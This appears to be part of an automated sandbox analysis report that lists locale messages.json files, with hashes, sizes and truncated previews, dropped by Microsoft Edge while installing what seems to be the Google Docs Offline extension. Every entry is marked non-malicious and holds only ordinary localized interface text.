                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                  Malicious:false
